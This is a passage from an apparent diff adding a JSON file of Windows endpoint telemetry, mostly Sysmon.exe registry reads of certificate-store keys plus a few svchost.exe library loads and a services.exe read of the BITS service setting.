"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bcd.dll", + "image_path": "C:\\Windows\\System32\\bcd.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", + "registry_value": "Start", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": 